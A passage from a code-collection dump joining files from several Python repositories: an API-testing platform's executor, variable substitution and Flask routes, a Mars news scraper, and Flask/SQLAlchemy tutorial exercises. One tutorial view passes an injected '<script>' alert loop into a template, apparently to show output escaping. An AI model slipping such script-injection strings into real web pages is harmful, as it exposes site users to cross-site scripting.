self.client=QA_util_sql_mongo_setting(self.QA_util_sql_mongo_ip,self.QA_util_sql_mongo_port)
self.user=self.QA_setting_login()
def QA_setting_login(self):
self.username=self.QA_setting_user_name
self.password=self.QA_setting_user_password
QA_util_log_info('username:'+str(self.QA_setting_user_name))
result=QA_user_sign_in(self.username,self.password,self.client)
if result==True:
self.user['username']=self.username
self.user['password']=<PASSWORD>
self.user['login']=True
return self.user
else:
QA_util_log_info('failed to login')
```
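A hedged sketch of how `QA_Setting` is driven (assumes a local MongoDB and a user record previously created via `QA_user_sign_up`):
```python
setting = QA_Setting()
setting.QA_setting_user_name = 'alice'     # hypothetical credentials
setting.QA_setting_user_password = 'secret'
setting.QA_setting_init()  # connects and fills setting.user on a successful login
```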
#### File: QUANTAXIS/QAUtil/QAType.py
```python
from QUANTAXIS.QAUtil.QADate import QA_util_date_valid
def QA_util_ensure_timeSerires(data):
pass
def QA_util_ensure_dict(data):
pass
def QA_util_ensure_date(data):
return QA_util_date_valid(data)
def QA_util_ensure_ms(data):
pass
``` |
{
"source": "52clover/clover",
"score": 2
} |
#### File: clover/core/executor.py
```python
import datetime
from clover.common import friendly_datetime
from clover.core.notify import Notify
from clover.core.logger import Logger
from clover.core.report import Report
from clover.core.request import Request
from clover.core.keyword import Keyword
from clover.core.variable import Variable
from clover.core.validator import Validator
from clover.core.exception import ResponseException
from clover.history.service import HistoryService
class Executor():
def __init__(self, type='trigger'):
self.type = type
        # status is one of error, failed, skipped or passed; it is handed to
        # Notify to decide whether a run-result notification should be sent.
self.status = 'passed'
def _set_status(self, status):
"""
        # A suite holds several interfaces and an interface several assertions,
        # so execution would otherwise keep overwriting the status. This method
        # prevents the status from being downgraded.
        # Priority: error > failed > skipped > passed
        # E.g. when the current status is failed, passing skipped changes nothing.
        :param status:
:return:
"""
if self.status == 'error':
return
elif self.status == 'failed':
if status != 'error':
return
self.status = status
elif self.status == 'skipped':
if status not in ['error', 'failed']:
return
self.status = status
else:
self.status = status
def save_interface_run_history(self, trigger, suite, case, validator):
"""
:param trigger:
:param suite:
:param case:
:param validator:
:return:
"""
        # Look up the interface run history by the composite key (suite id, case id); update it when found.
service = HistoryService()
history = {
'suite_id': suite.id,
'interface_id': case.id,
'suite_name': suite.name,
'interface_name': case.name,
'team': case.team,
'project': case.project,
'type': case.type,
'sub_type': case.sub_type,
'success': validator.status == 'passed',
'error': validator.status == 'error',
'failed': validator.status == 'failed',
            'skiped': validator.status == 'skipped',  # key name kept to match the DB schema; the compared value had a typo
'valid': trigger.trigger != 'clover'
}
return service.create(history)
def execute(self, suite, trigger):
"""
:param suite:
:param trigger:
:return:
"""
        # Note: Report must be instantiated right at the start; it records the start timestamp in its initializer.
cookies, report, details = None, Report(), []
"""
        # Note: the Variable object must be created outside the loop; its
        # lifetime matches the executor's. Platform-preset custom variables are
        # looked up by team and project; the trigger argument carries variables
        # supplied at trigger time, which take precedence over the presets.
"""
keyword = Keyword('')
variable = Variable(suite, trigger)
        # Logs are kept as class attributes, so clear stale log data first.
Logger.clear()
Logger.log("团队:{},项目:{}".format(suite.team, suite.project), "开始执行")
for case in suite.cases:
detail = {'name': case.name}
detail.setdefault('start', friendly_datetime(datetime.datetime.now()))
request = Request(case, cookies)
response = None
validator = Validator()
variable.replace_variable(request)
keyword.call_keyword(request, 'before_request')
try:
                # Skip the HTTP request when the case is flagged as skipped.
if case.status:
response = request.send_request()
cookies = response.cookies
                # When the case is skipped or the request errors, response is None; use 0 for elapsed.
elapsed = response.elapsed if response is not None else 0
detail.setdefault('elapsed', elapsed)
except ResponseException:
Logger.log("请求异常,状态码:{}".format(request.status), "发送请求", 'error')
Logger.log(request.message, "发送请求", 'error')
self._set_status('error')
validator.status = 'error'
validator.verify(case, response, variable)
detail.setdefault('status', validator.status)
detail.setdefault('result', validator.result)
self._set_status(validator.status)
validator.performance(response)
detail.setdefault('threshold', validator.threshold)
detail.setdefault('performance', validator.level)
variable.extract_variable_from_response(case, response)
detail.setdefault('end', friendly_datetime(datetime.datetime.now()))
self.save_interface_run_history(trigger, suite, case, validator)
details.append(detail)
            # Debug mode: return the response data to the front-end page.
if self.type == 'debug':
return 0, "debug", response.get_response()
# print(Logger.logs)
        # Persist the run's test report to the database.
data = report.save(suite, trigger, details, Logger)
notify = Notify()
notify.send_message(data, self.status)
```
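The promotion rule in `_set_status` only moves the status upward along passed < skipped < failed < error. A hedged illustration (this part needs no database; it assumes the clover package is importable):
```python
ex = Executor()
ex._set_status('skipped')  # passed  -> skipped
ex._set_status('failed')   # skipped -> failed
ex._set_status('skipped')  # failed stays failed
ex._set_status('error')    # failed  -> error
print(ex.status)           # 'error'
```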
#### File: clover/core/variable.py
```python
import re
from typing import Text
from clover.core import RESERVED
from clover.core.logger import Logger
from clover.core.request import Request
from clover.core.extractor import Extractor
from clover.models import query_to_dict
from clover.environment.models import VariableModel
class Variable(object):
def __init__(self, case, trigger):
"""
:param case:
:param trigger:
"""
self.team = case.team
self.project = case.project
self.extract = []
if hasattr(trigger, 'variable'):
self.trigger = trigger.variable
else:
self.trigger = []
self.variables = self.load_default_variable()
def load_default_variable(self):
"""
:return:
"""
        # Load the variables preset on the variable-settings page.
filter = {
'team': self.team,
'project': self.project
}
default = VariableModel.query.filter_by(**filter).all()
return query_to_dict(default)
@staticmethod
def is_reserved_variable(data):
"""
        # Built-in variables are typically referenced as:
        #   ${response}.status
        #   ${response}.header.contenttype
        #   ${request}.path
        # i.e. the built-in variable always sits in the first position.
:param data:
:return:
"""
        # Do nothing when data is empty.
if not data or not isinstance(data, (Text,)):
return False, None
data = data.split('.')[0]
match = re.search(r'\$\{(\w+?)\}', data)
if match:
variable = match.group(1).strip()
if variable in RESERVED:
return True, variable
else:
return False, None
def derivation(self, data: Text):
"""
:param data:
:return:
"""
        # Do nothing when data is empty.
if not data or not isinstance(data, (Text,)):
return data
variables = re.findall(r'\$\{(\w+?)\}', data)
for variable in variables:
if variable:
variable = variable.strip()
                # Note the variable precedence:
                # interface-context variables > trigger-time variables > user-configured defaults
extract = self.extract
for result in extract:
if variable == result['name']:
data = data.replace('${' + variable + '}', str(result['value']))
trigger = self.trigger
for result in trigger:
if variable == result['name']:
data = data.replace('${' + variable + '}', str(result['value']))
default = self.variables
for result in default:
if variable == result['name']:
data = data.replace('${' + variable + '}', str(result['value']))
return data
def replace_variable(self, request: Request) -> Request:
request.url = self.derivation(request.url)
if request.header:
Logger.log("请求头替换前[{}]".format(request.header), "变量替换")
for key, value in request.header.items():
request.header[key] = self.derivation(value)
Logger.log("请求头替换后[{}]".format(request.header), "变量替换")
if request.parameter:
Logger.log("请求参数替换前[{}]".format(request.parameter), "变量替换")
for key, value in request.parameter.items():
request.parameter[key] = self.derivation(value)
Logger.log("请求参数替换后[{}]".format(request.parameter), "变量替换")
if request.body:
Logger.log("请求体替换前[{}]".format(request.body), "变量替换")
if request.body_mode in ['formdata', 'urlencoded']:
for key, value in request.body.items():
request.body[key] = self.derivation(value)
elif request.body_mode in ['file']:
pass
else:
"""
# 这是"expected string or bytes-like object"问题的一个临时解决方案。
# 原因是当body数据类型为raw,数据为json时,view层接收数据时自动将其转为
# python对象,因此这里进行derivation会报错。
"""
if isinstance(request.body, (list,)):
for key, value in request.body.items():
request.body[key] = self.derivation(value)
else:
request.body = self.derivation(request.body)
Logger.log("请求体替换前[{}]".format(request.body), "变量替换")
return request
def extract_variable_from_response(self, case, response):
"""
:param case:
:param response:
:return:
"""
Logger.log("提取接口间变量", "提取变量")
        # Added as a stopgap; this handling still needs a closer look.
if response is None or not hasattr(response, 'response'):
Logger.log("响应为None或响应无数据。", "提取变量", level='warn')
return
if not hasattr(case, 'extract') or not case.extract:
Logger.log("用例不需要提取变量。", "提取变量", level='warn')
return case
Logger.log("提取接口间变量开始[{}]".format(self.extract), "提取变量")
for extract in case.extract:
            # Extract the data the assertions will run against.
selector = extract.get('selector', 'delimiter')
extractor = Extractor(selector)
expression = extract.get('expression', None)
variable = extract.get('variable', None)
            # The expression may contain variables; substitute their values.
flag, reserved = self.is_reserved_variable(expression)
if flag:
if reserved == 'response':
index = expression.index('.')
_expression = expression[index + 1:]
if _expression == 'status':
result = response.status
elif _expression == 'elapsed':
result = response.elapsed
elif 'header' in _expression:
expr = _expression.split('.')[-1]
result = response.header.get(expr)
else:
result = extractor.extract(response.response, _expression, '.')
else:
result = extractor.extract(response.response, expression, '.')
"""
            # Do not simply append here: if two variables share a name with
            # different values, the later one would never take effect, so
            # variable names must stay unique.
"""
for _varibale in self.extract:
if variable == _varibale['name']:
_varibale['value'] = result
break
else:
self.extract.append({'name': variable, 'value': result})
Logger.log("提取接口间变量完成[{}]".format(self.extract), "提取变量")
```
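The substitution in `derivation` is a plain regex-driven template fill. A self-contained sketch of the same mechanism (the names and values below are made up):
```python
import re

template = 'https://example.com/api?user=${user_id}&t=${token}'  # hypothetical
values = {'user_id': '42', 'token': 'abc'}

# Find every ${name} placeholder and replace it with its known value.
for name in re.findall(r'\$\{(\w+?)\}', template):
    if name in values:
        template = template.replace('${' + name + '}', values[name])

print(template)  # https://example.com/api?user=42&t=abc
```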
#### File: clover/clover/urls.py
```python
from clover.environment.views import TeamView as Team
from clover.keyword.views import KeywordView as Keyword
from clover.environment.views import VariableView as Variable
from clover.history.views import HistoryView as History
from clover.interface.views import InterfaceView as Interface
from clover.suite.views import SuiteView as Suite
from clover.report.views import ReportView as Report
from clover.index.views import IndexView as Index
from clover.task.views import TaskView as Task
from clover.plugin.views import PluginView as Plugin
def map_urls(app):
    # Version-related routes and views: still to be added
    # Index-related routes and views
index = Index.as_view("index")
app.add_url_rule(
"/api/v1/index/info",
view_func=index,
methods=['GET'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/index/count",
view_func=index,
methods=['GET'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/index/config",
view_func=index,
methods=['GET'],
strict_slashes=False,
)
    # Configuration-management routes and views
team = Team.as_view("team")
app.add_url_rule(
"/api/v1/team/create",
view_func=team,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/team/delete",
view_func=team,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/team/update",
view_func=team,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/team/search",
view_func=team,
methods=['GET'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/team/aggregate",
view_func=team,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/team/navigation",
view_func=team,
methods=['POST'],
strict_slashes=False,
)
variable = Variable.as_view("variable")
app.add_url_rule(
"/api/v1/variable/create",
view_func=variable,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/variable/delete",
view_func=variable,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/variable/update",
view_func=variable,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/variable/search",
view_func=variable,
methods=['GET'],
strict_slashes=False,
)
    # Keyword routes and views
keyword = Keyword.as_view("keyword")
app.add_url_rule(
"/api/v1/keyword/create",
view_func=keyword,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/keyword/delete",
view_func=keyword,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/keyword/update",
view_func=keyword,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/keyword/search",
view_func=keyword,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/keyword/debug",
view_func=keyword,
methods=['POST'],
strict_slashes=False,
)
    # Interface-testing routes and views
interface = Interface.as_view("interface")
app.add_url_rule(
"/api/v1/interface/create",
view_func=interface,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/delete",
view_func=interface,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/update",
view_func=interface,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/search",
view_func=interface,
methods=['GET', 'POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/trigger",
view_func=interface,
methods=['GET', 'POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/switch",
view_func=interface,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/interface/tree",
view_func=interface,
methods=['POST'],
strict_slashes=False,
)
    # Test-suite routes and views
suite = Suite.as_view("suite")
app.add_url_rule(
"/api/v1/suite/create",
view_func=suite,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/suite/delete",
view_func=suite,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/suite/update",
view_func=suite,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/suite/search",
view_func=suite,
methods=['GET', 'POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/suite/trigger",
view_func=suite,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/suite/switch",
view_func=suite,
methods=['POST'],
strict_slashes=False,
)
    # Scheduled-task routes and views
task = Task.as_view("task")
app.add_url_rule(
"/api/v1/task/create",
view_func=task,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/task/delete",
view_func=task,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/task/update",
view_func=task,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/task/search",
view_func=task,
        methods=['GET', 'POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/report/trigger",
view_func=task,
methods=['POST'],
strict_slashes=False,
)
    # Test-report routes and views
report = Report.as_view("report")
app.add_url_rule(
"/api/v1/report/delete",
view_func=report,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/report/search",
view_func=report,
methods=['POST'],
strict_slashes=False,
)
app.add_url_rule(
"/api/v1/report/log",
view_func=report,
methods=['POST'],
strict_slashes=False,
)
    # Plugin routes and views
plugin = Plugin.as_view("plugin")
app.add_url_rule(
"/api/v1/plugin/create",
view_func=plugin,
methods=['POST'],
strict_slashes=False,
)
``` |
{
"source": "52Godfrey/Web-Scrape-Challenge",
"score": 4
} |
#### File: 52Godfrey/Web-Scrape-Challenge/scrape_mars.py
```python
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
import requests
from webdriver_manager.chrome import ChromeDriverManager
def init_browser():
executable_path = {'executable_path': ChromeDriverManager().install()}
return Browser("chrome", **executable_path, headless=False)
def scrape_info():
browser = init_browser()
    # NASA MARS NEWS
# URL of page to be scraped
url = "https://mars.nasa.gov/news/"
# Retrieve page with Browser
browser.visit(url)
# HTML object
html = browser.html
# Create BeautifulSoup object; parse with 'html.parser'
soup = BeautifulSoup(html, 'html.parser')
# Extract latest News title text
news_title_s = soup.find_all('div', class_="content_title")[1].find("a").text
# Extract latest News paragraph text
news_p_s = soup.find('div', class_="article_teaser_body").text
# Quit browser
browser.quit()
#MARS FACTS
# Use Pandas to scrape the table containing facts about the planet including Diameter, Mass, etc.
# URL of page to be scraped
facts_url = "https://space-facts.com/mars/"
# Use the read_html function in Pandas to automatically scrape any tabular data from a page
facts_tables = pd.read_html(facts_url)
# Slice off any of those dataframes that we want using normal indexing
facts_df = facts_tables[0]
# Rename the columns and set Description column as index
facts_df = facts_df.rename (columns ={0:"Description", 1:"Mars"})
facts_df.set_index("Description", inplace=True)
# Convert the data to a HTML table string
html_table = facts_df.to_html()
# Strip unwanted newlines to clean up the table
html_table = html_table.replace('\n', '')
#MARS HEMISPHERE
# URL of page to be scraped
hem_url = "https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars"
# Retrieve page with the requests module
response = requests.get(hem_url)
# Create BeautifulSoup object; parse with 'lxml'
soup = BeautifulSoup(response.text, 'lxml')
# Examine the results, then determine element that contains sought info
# titles are returned as an iterable list
results = soup.find_all('div', class_='description')
titles = []
# Loop through returned results
for result in results:
title = result.find('h3').text
titles.append(title)
# Examine the results, then determine element that contains sought info
# image urls are returned as an iterable list
img_results = soup.find_all('div', class_='item')
image_urls = []
# Loop through returned results
for result in img_results:
href = result.find('a')['href']
link = 'https://astrogeology.usgs.gov' + href
# Retrieve page with the requests module
response2 = requests.get(link)
# Create BeautifulSoup object; parse with 'lxml'
soup2 = BeautifulSoup(response2.text, 'lxml')
href2 = soup2.find('img', class_='wide-image')['src']
img_url = 'https://astrogeology.usgs.gov' + href2
image_urls.append(img_url)
#Append the dictionary with the image url string and the hemisphere title to a list.
#This list will contain one dictionary for each hemisphere.
hemisphere_image_urls = [
{"title": titles[0], "img_url": image_urls[0]},
{"title": titles[1], "img_url": image_urls[1]},
{"title": titles[2], "img_url": image_urls[2]},
{"title": titles[3], "img_url": image_urls[3]},
]
all_info = {
"latest_news_title": news_title_s,
"latest_news_paragraph": news_p_s,
"mars_fact": html_table,
"mars_hemisphere": hemisphere_image_urls
}
return all_info
``` |
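`pd.read_html` returns one DataFrame per `<table>` element it finds, which is why the script indexes `facts_tables[0]`. A tiny standalone demonstration (requires lxml or html5lib to be installed):
```python
import pandas as pd

html = "<table><tr><td>Diameter</td><td>6,779 km</td></tr></table>"
tables = pd.read_html(html)  # -> list containing a single DataFrame
print(tables[0])
```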
{
"source": "52itsmile/Flask_basics",
"score": 3
} |
#### File: Flask_test/02_day/flask_02_context.py
```python
from flask import Flask
# Request-context variables
from flask import request
from flask import session
# Application-context variables
from flask import current_app
from flask import g
app = Flask(__name__)
# print(session.get('user_id',''))
@app.route('/')
def index():
print(request.method)
return 'index'
if __name__ == '__main__':
app.run(debug=True)
```
#### File: Flask_test/02_day/flask_02_cookie.py
```python
from flask import Flask
from flask import make_response
from flask import request
app = Flask(__name__)
@app.route('/')
def index():
user_name = request.cookies.get('user_id')
user_id = request.cookies.get('user_name')
return "%s%s"%(user_name,user_id)
@app.route('/login')
def login():
    # Assume the account and password are correct.
response = make_response('success')
response.set_cookie('user_id','1',max_age=3600)
response.set_cookie('user_name','laowang',max_age=3600)
return response
@app.route('/logout')
def logout():
    # Assume the account and password are correct.
response = make_response('success')
response.delete_cookie('user_id')
response.delete_cookie('user_name')
return response
if __name__ == '__main__':
app.run(debug=True)
```
#### File: Flask_test/02_day/flask_02_gouzifunc.py
```python
from flask import Flask
app = Flask(__name__)
@app.before_first_request
def before_first_request():
"""在第一次请求之前会访问该函数"""
print('before_first_request')
@app.before_request
def before_request():
"""在每次请求之前都会调用"""
print('before_first_request')
#可以对一些非法的请求进行阻止
# 如果ip在黑名单
# 返回 '你在~~~'
@app.after_request
def after_request(response):
    # Runs after every request; receives the response and must return it.
print('after_request')
return response
@app.teardown_request
def teardown_request(error):
    # Runs after the request; if handling raised an exception, it is passed in here.
print('teardown_request')
print(error)
@app.route('/')
def index():
return 'index'
if __name__ == '__main__':
app.run()
```
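The hook order above can be exercised without a browser via Flask's built-in test client. A hedged sketch reusing the `app` object defined in this file:
```python
with app.test_client() as client:  # assumes the app defined above
    client.get('/')
# console output on the first request, in order:
# before_first_request, before_request, after_request, teardown_request
```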
#### File: Flask_test/03_day/template.py
```python
from flask import Flask
from flask import render_template
app = Flask(__name__)
@app.route('/')
def index():
return 'index'
@app.route('/demo1')
def demo1():
my_name = 'wwww'
my_str = '<script>for (var i;i<=3;i++){alert("哈哈")}</script>'
my_list = [1, 2, 3, 4]
my_dict = {'name':'laowang',
'age':18}
my_dict_list = [
{
'good_name':"大白菜",
'price':10
},
{
'price':20
}
]
return render_template('template.html',
my_name = my_name,
my_dict = my_dict,
my_list = my_list,
my_str = my_str,
my_dict_list = my_dict_list)
# Option 1: register the filter with a decorator
@app.template_filter('lireverse')
def do_lireverse(li):
temp = list(li)
temp.reverse()
return temp
# Option 2: register the filter directly (registering the same filter twice
# is redundant but harmless)
app.add_template_filter(do_lireverse, 'lireverse')
@app.route('/demo2')
def demo2():
my_list1 = [
{
"id": 1,
"value": "我爱工作"
},
{
"id": 2,
"value": "工作使人快乐"
},
{
"id": 3,
"value": "沉迷于工作无法自拔"
},
{
"id": 4,
"value": "日渐消瘦"
},
{
"id": 5,
"value": "以梦为马,越骑越傻"
}
    ]
    # The original ended without returning a response, which makes Flask raise
    # an error; returning the list's repr is an assumed minimal fix.
    return str(my_list1)
# @app.route('/demo3')
# def demo3():
# return render_template('template.html')
if __name__ == "__main__":
app.run(debug=True)
```
#### File: Flask_test/03_day/tem_test.py
```python
from flask import Flask
from flask import render_template
app = Flask(__name__)
@app.route('/')
def index():
return 'index'
@app.route('/demo1')
def demo1():
test_str = 'qwewqerwwtddf'
test_list = [2,3,4,51,85,93]
test_id = 1
test_dict = {
'name':'Tom',
'age':18
}
my_list_color = [
{
"id": 1,
"value": "我爱工作"
},
{
"id": 2,
"value": "工作使人快乐"
},
{
"id": 3,
"value": "沉迷于工作无法自拔"
},
{
"id": 4,
"value": "日渐消瘦"
},
{
"id": 5,
"value": "以梦为马,越骑越傻"
}
]
return render_template('tem_test.html',
my_str = test_str,
my_list = test_list,
my_id = test_id,
my_dict = test_dict,
my_list_color = my_list_color)
@app.template_filter('reverseself')
def self_filter(list_test):
print(list_test)
temp = list(list_test)
temp.reverse()
print(temp)
return temp
# app.add_template_filter(self_filter,'reverse_self')
@app.template_filter('color')
def do_color(value):
if value == 1:
print(value)
return "orange"
elif value == 2:
print(value)
return "green"
elif value == 3:
print(value)
return "red"
else:
print(value)
return "yellow"
class Config(object):
DEBUG = True
app.config.from_object(Config)
if __name__ == "__main__":
app.run()
```
#### File: Flask_test/book_test/book_demo.py
```python
from flask import Flask
from flask import flash
from flask import redirect
from flask import render_template
from flask import request
from flask import url_for
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import InputRequired
app = Flask(__name__)
app.secret_key = 'qwerwertre'
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:[email protected]:3306/python_test'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class AddBookForm(FlaskForm):
author = StringField('作者:',validators=[InputRequired('请输入作者')])
book = StringField('书名:',validators=[InputRequired('请输入书名')])
submit = SubmitField('添加')
class Author(db.Model):
    # the "one" side of the one-to-many relation
__tablename__ = 'author'
id = db.Column(db.Integer,primary_key=True)
name = db.Column(db.String(64), unique=True)
books = db.relationship('Book', backref='author')
class Book(db.Model):
    # the "many" side of the one-to-many relation
__tablename__ = 'book'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
author_id = db.Column(db.Integer,db.ForeignKey(Author.id))
@app.route('/delete_book/<book_id>')
def delete_book(book_id):
try:
book = Book.query.get(book_id)
except Exception as error:
print(error)
flash('查询错误')
if not book:
print('书籍不存在')
flash('书籍不存在')
else:
try:
db.session.delete(book)
db.session.commit()
except Exception as error:
print('错误')
db.session.rollback()
flash('删除失败')
return redirect(url_for('index'))
@app.route('/delete_author/<author_id>')
def delete_author(author_id):
try:
author = Author.query.get(author_id)
except Exception as error:
flash('查询出错')
if not author:
return '查无此人'
else:
try:
Book.query.filter(Book.author_id==author_id).delete()
db.session.delete(author)
db.session.commit()
except Exception as error:
flash('删除出现异常')
return '删除错误'
return redirect(url_for('index'))
# @app.route('/delete_author/<author_id>')
# def delete_author(author_id):
# """删除作者以及作者所有的书籍"""
#
# try:
# author = Author.query.get(author_id)
# except Exception as e:
# print(e)
# return "查询错误"
#
# if not author:
# return "作者不存在"
#
# # 删除作者及其所有书籍
#
# try:
# # 先删除书籍
# Book.query.filter(Book.author_id == author_id).delete()
# # 再删除指定作者
# db.session.delete(author)
# db.session.commit()
# except Exception as e:
# print(e)
# db.session.rollback()
# return "删除失败"
#
# return redirect(url_for('index'))
# @app.route('/delete_book/<book_id>')
# def delete_book(book_id):
#
# try:
# book = Book.query.get(book_id)
# except Exception as error:
# print(error)
# return '查询错误'
# if not book:
# return "书籍不存在"
#
# try:
# db.session.delete(book)
# db.session.commit()
# except Exception as error:
# print(error)
# db.session.rollback()
# return '删除失败'
# return redirect(url_for('index'))
@app.route('/',methods=['POST','GET'])
def index():
book_form = AddBookForm()
if book_form.validate_on_submit():
author_name = book_form.author.data
book_name = book_form.book.data
author = Author.query.filter(Author.name == author_name).first()
book = Book.query.filter(Book.name == book_name).first()
if author and not book:
try:
book = Book(name=book_name,author_id=author.id)
db.session.add(book)
db.session.commit()
except Exception as error:
db.session.rollback()
print(error)
flash('添加失败')
return
        # Neither the author nor the book exists
elif not author and not book:
try:
author = Author(name=author_name)
db.session.add(author)
db.session.commit()
book = Book(name=book_name, author_id=author.id)
db.session.add(book)
db.session.commit()
except Exception as error:
db.session.rollback()
print(error)
flash('添加错误')
else:
print('重复添加')
flash('重复添加')
        # author exists and the book exists
        # author does not exist but the book exists
else:
if request.method == 'POST':
flash('参数错误')
        # Check whether book_form passes validation;
        # if so, run the handling logic (legacy version kept commented out below).
# if book_form.validate_on_submit():
# author_name = book_form.author.data
# book_name = book_form.book.data
# # 1.提交表单首先查询作者的名字
# author = Author.query.filter(Author.name == author_name).first()
# # 判断作者名字是否存在
# if not author:
# # 如果作者名字不存在
# # 添加作者信息到数据库
# try:
# author = Author(name=author_name)
# db.session.add(author)
# db.session.commit()
# book = Book(name=book_name, author_id=author.id)
# db.session.add(book)
# db.session.commit()
# except Exception as error:
# db.session.rollback()
# print(error)
# flash('添加失败')
# else:
# book = Book.query.filter(Book.name == book_name).first()
# if not book:
# try:
# # 否则添加书籍到数据库(指定作者)
# book = Book(name=book_name,author_id=author.id)
# db.session.add(book)
# db.session.commit()
# except Exception as error:
# print(error)
# flash("添加失败")
# else:
# flash('已经存在')
# # 如果不能被提交则提示错误
# else:
# if request.method == "POST":
# flash('错误')
authors = Author.query.all()
    # Using the plain HTML form:
# return render_template('base.html',authors=authors)
# print(book_form)
    # Using the WTForms form:
return render_template('base_form.html',authors=authors, form=book_form)
class Config(object):
DEBUG = True
app.config.from_object(Config)
if __name__ == "__main__":
# db.drop_all()
db.create_all()
# au1 = Author(name='张三')
# au2 = Author(name='王五')
# au3 = Author(name='李四')
# db.session.add_all([au1,au2,au3])
# db.session.commit()
#
# bk1 = Book(name='asdfsd',author_id=au1.id)
# bk2 = Book(name='sdfsdfbxvxc',author_id=au2.id)
# bk3 = Book(name='cxfdgdh',author_id=au3.id)
# db.session.add_all([bk1,bk2,bk3])
# db.session.commit()
app.run()
```
#### File: Flask_test/redis/demo1_redisconect.py
```python
from redis import StrictRedis
def demo():
sr = StrictRedis(host='127.0.0.1')
try:
result = sr.set('name','itheima')
print(result)
except Exception as error:
print(error)
if __name__ == '__main__':
demo()
```
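A hedged round-trip sketch for the connection above (requires a Redis server on 127.0.0.1:6379):
```python
from redis import StrictRedis

sr = StrictRedis(host='127.0.0.1', decode_responses=True)
sr.set('name', 'itheima')
print(sr.get('name'))  # 'itheima' (a str thanks to decode_responses=True)
```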
#### File: Flask_test/SQLAlchemy_test/sql_test.py
```python
from flask_sqlalchemy import SQLAlchemy
from flask import Flask
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:[email protected]:3306/test'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class Role(db.Model):
    # table name
__tablename__ = 'roles'
    # column definitions
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
us = db.relationship('User', backref='role')
# print(us)
# repr()方法显示一个可读字符串
def __repr__(self):
return 'Role:%s' % self.name
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True, index=True)
email = db.Column(db.String(64), unique=True)
password = db.Column(db.String(64))
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
def __repr__(self):
return 'User:%s' % self.name
@app.route('/')
def index():
return 'index'
class Config(object):
DEBUG = True
app.config.from_object(Config)
if __name__ == "__main__":
db.drop_all()
db.create_all()
ro1 = Role(name='admin')
db.session.add(ro1)
db.session.commit()
    # insert another row
ro2 = Role(name='user')
db.session.add(ro2)
db.session.commit()
us1 = User(name='wang', email='<EMAIL>', password='<PASSWORD>', role_id=ro1.id)
us2 = User(name='zhang', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
us3 = User(name='chen', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
us4 = User(name='zhou', email='<EMAIL>', password='<PASSWORD>', role_id=ro1.id)
us5 = User(name='tang', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
us6 = User(name='wu', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
us7 = User(name='qian', email='<EMAIL>', password='<PASSWORD>', role_id=ro1.id)
us8 = User(name='liu', email='<EMAIL>', password='<PASSWORD>', role_id=ro1.id)
us9 = User(name='li', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
us10 = User(name='sun', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
db.session.add_all([us1, us2, us3, us4, us5, us6, us7, us8, us9, us10])
db.session.commit()
"""
    Query all users:
        User.query.all()
    Count the users:
        User.query.count()
    Get the first user:
        User.query.first()
    Get the user with id 4 (three ways):
        User.query.get(4)
        User.query.filter_by(id=4).first()
        User.query.filter(User.id==4).first()
    All users whose name ends with 'g' (startswith/contains work the same way):
        User.query.filter(User.name.endswith('g')).all()
    All users whose name is not 'wang' (two ways):
        User.query.filter(not_(User.name=='wang')).all()
        User.query.filter(User.name != 'wang').all()
    Users whose name and email both start with 'li' (two ways):
        User.query.filter(User.name.startswith('li'),User.email.startswith('li')).all()
        User.query.filter(and_(User.name.startswith('li'),User.email.startswith('li'))).all()
